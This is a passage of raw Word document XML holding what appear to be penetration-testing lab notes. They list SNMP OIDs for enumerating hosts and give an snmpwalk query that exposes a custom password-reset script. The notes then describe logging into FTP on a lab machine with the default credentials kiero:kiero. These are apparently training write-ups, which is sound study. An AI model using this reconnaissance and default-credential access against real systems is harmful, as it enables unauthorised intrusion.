      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only vendor/private OIDs (1.3.6.1.4.1.xxx) are tied to specific OSes or vendors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB (1.3.6.1.4.1.8072.1.3.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB is under the Net-SNMP private enterprise branch:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.6.1.4.1 → enterprise/private MIBs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8072 → the number IANA assigned to the Net-SNMP project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003110">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003111">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003112">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows INSTALLED SOFTWARE  1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003113">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows SYSTEM INFO     1.3.6.1.2.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003114">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows HOSTNAME        1.3.6.1.2.1.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003115">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows DOMAIN          1.3.6.1.4.1.77.1.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003116">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows UPTIME          1.3.6.1.2.1.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003117">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows USERS           1.3.6.1.4.1.77.1.2.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003118">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows SHARES          1.3.6.1.4.1.77.1.2.27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003119">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows DISKS           1.3.6.1.2.1.25.2.3.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows SERVICES        1.3.6.1.4.1.77.1.2.3.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   SYSTEM INFO     1.3.6.1.2.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003120">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   HOSTNAME        1.3.6.1.2.1.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003121">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   UPTIME          1.3.6.1.2.1.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003122">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   MOUNTPOINTS     1.3.6.1.2.1.25.2.3.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003123">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   RUNNING SOFTWARE PATHS  1.3.6.1.2.1.25.4.2.1.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003124">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003125">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003126">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003127">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5229225" cy="2609850"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="519" name="image505.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image505.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1091"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5229225" cy="26098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128">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003129">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8q2pb6baqmty" w:id="436"/>
      <w:bookmarkEnd w:id="436"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most helpful SNMP commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v 1 -c public 192.168.220.149 NET-SNMP-EXTEND-MIB::nsExtendObjects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX-B .149 and it revealed hint for default password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in XXXXXXXXX-C .156 for creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003131">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB::nsExtendObjects is a table of admin-defined custom scripts/commands exposed via SNMP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Down in the screenshot below, we find one of these custom scripts ran is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/john/RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003133">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as a "backdoor" into whatever the sysadmin decided to publish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s not a standard OID like uptime or processes — it’s custom and can reveal or even let you execute local commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003135">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1092"/>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3136">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found two usernames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003137">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it said that Kiero password was reset to default. If you google it, kiero is an application and it's default password is kiero so I tried kiero:kiero for FTP and I got in!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003138">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To understand the output, you need these two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003139">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: /home/john/RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTENDOutLine."RESET" = STRING: Resetting password of kiero to the default value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This basically means whenever we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/john/RESET_PASSWD </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we reset password of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiero </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
